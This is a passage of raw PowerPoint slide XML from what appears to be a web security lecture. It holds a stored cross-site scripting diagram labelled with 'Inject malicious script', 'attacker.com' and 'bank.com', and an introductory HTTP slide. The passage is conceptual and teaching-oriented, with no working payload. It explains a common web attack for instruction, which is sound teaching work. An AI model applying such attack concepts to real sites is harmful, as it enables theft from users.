        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="600075">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483225" y="4587240"/>
            <a:ext cx="2863215" cy="2132330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Patsy/Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2147570" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="718185" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1060"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="408000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1B6665-199D-4742-96F1-34E9B4EC77B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D890935-17DA-7A40-B72F-F89FD734738B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</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ACC276-41B3-D94A-A221-1D642D558EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A78882E-4961-3D43-842A-B245A7D7BC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP: Hypertext Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A common data communication protocol on the web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78CD938C-06EB-704E-84B1-4BAD64BD531B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3716020"/>
            <a:ext cx="3487735" cy="2862261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA6D9DC-1C6D-E144-BFD0-CD472935ED0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147637" y="3711257"/>
            <a:ext cx="3497579" cy="2872105"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3497579" h="2872104">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3497260" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497260" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2871786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA971AB-0A6D-B04C-8EAF-256EDB50B03F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366000" y="3351600"/>
            <a:ext cx="1549400" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SERVER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657B2EDB-7B4B-504C-B558-26067254F027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850961" y="4883156"/>
            <a:ext cx="3577263" cy="143862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88B73AF-B676-174D-AB2F-7B9CA2BF1D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3910011" y="4919205"/>
            <a:ext cx="3328670" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="25400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3328594" y="24789"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B76102-D869-0845-AAD0-C65011FCFD9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7176391" y="4881781"/>
            <a:ext cx="156135" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8AF6C1-2765-BD47-9E2B-809482FA6BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850960" y="5555378"/>
            <a:ext cx="3577264" cy="147691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD08F499-E338-504C-80CD-386DD99B0943}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4040577" y="5592544"/>
            <a:ext cx="3328670" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3328670" h="28575">
                <a:moveTo>
                  <a:pt x="3328596" y="28475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38099">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA03179A-D65E-1348-904C-F12B51AF8DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3946657" y="5531015"/>
            <a:ext cx="156182" cy="123790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6465A280-220E-8748-8D29-1E50178766FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669245" y="3352800"/>
            <a:ext cx="2159000" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CLIENT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-90" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>BROWSER</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5378C879-5C9F-DD41-ADBB-B0371C698EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237827" y="4048267"/>
            <a:ext cx="2799080" cy="775853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="44450" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
